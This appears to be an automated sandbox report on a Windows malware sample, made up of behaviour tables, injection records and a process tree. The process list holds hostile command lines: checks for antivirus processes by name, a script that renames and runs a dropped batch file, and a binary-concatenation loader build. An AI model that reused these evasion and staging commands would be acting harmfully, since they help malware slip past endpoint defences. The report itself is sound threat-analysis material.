Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe

"C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp" /SL5="$80238,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1664

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4764 -ip 4764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4764 -ip 4764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1620

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe

"C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

